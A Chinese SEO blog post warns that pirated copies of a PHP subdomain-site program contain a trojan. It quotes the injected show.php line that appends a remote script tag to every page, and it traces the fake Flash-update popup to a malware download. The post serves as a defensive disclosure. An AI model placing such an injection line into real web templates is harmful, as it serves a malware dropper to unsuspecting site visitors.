据悉,因盗版“科普一下”泛二级程序疑似强制加载JS木马,此事件已导致程序作者“新程序已上线”心态爆裂,解散QQ群,并停止更新程序。
诱因是因为程序作者还没发布,盗版已经漫天飞舞,在各大二手交易平台肆意传播。
人作者只卖1000u,而盗版份子却卖5000u,割韭菜飞起,导致程序作者“新程序已上线”心里不平衡,灰心丧气后无意更新程序,无意继续带大家学习php。
特别提示
本站发布程序已经过“新程序已上线”本人授权,无偿提供给各位爱学习的网友,本地断网学习php语言。
通过本地调试,我们可以学习到如何使用php进行调用根目录下指定文件夹内随机文本文件的随机行,以及在线获取某个html页面标题、内容的方式,充分体悟到php语言的独特魅力。
后门变木马
据热心网友消息:在某鱼上购买的“科普一下”泛二级程序的show.php中,第647行,添加了:
$moban = str_replace( "</html>", "\r\n</html><!--新程序-->\r\n<script type=\"text/javascript\" src=\"https://www.flash-zh.com/flash.js\" charset=\"UTF-8\"></script>",$moban);
如下图所示:
该域名网站标题为“Flash官网-Flash Player下载 _Flash中心_重橙网络”,明显意思盗版flash网站。
且该域名注册时间为:2023年3月15日,明显就是新注册的。
经过测试测试发现:当html页面加载该JS时,会弹出窗口告知你需要立刻升级flash
如果你点击“立刻升级”,则会跳转至网站:https://down.flashs.one/download/
但显然该网站是:2023年3月23日新注册的
当我们点击下载,它会下载:flashcenter_pp_ax_install_cn.exe这个文件
为安全起见,将该文件上传至服务器测试,立刻报毒。
后面我们还尝试进行了安装测试,由于略感恐怖,操作到一般直接关闭所有进程,全盘查杀。
后且对该文件进行了木马云查杀,确信的确就是木马文件!
所以说大家赶紧排查一下吧!
本站所有内容仅限用于学习和研究目的,程序仅供本地断网测试,转载请说明出处!
站群SEO » 警惕:盗版“科普一下”泛二级程序强制加载JS木马
站群SEO » 警惕:盗版“科普一下”泛二级程序强制加载JS木马
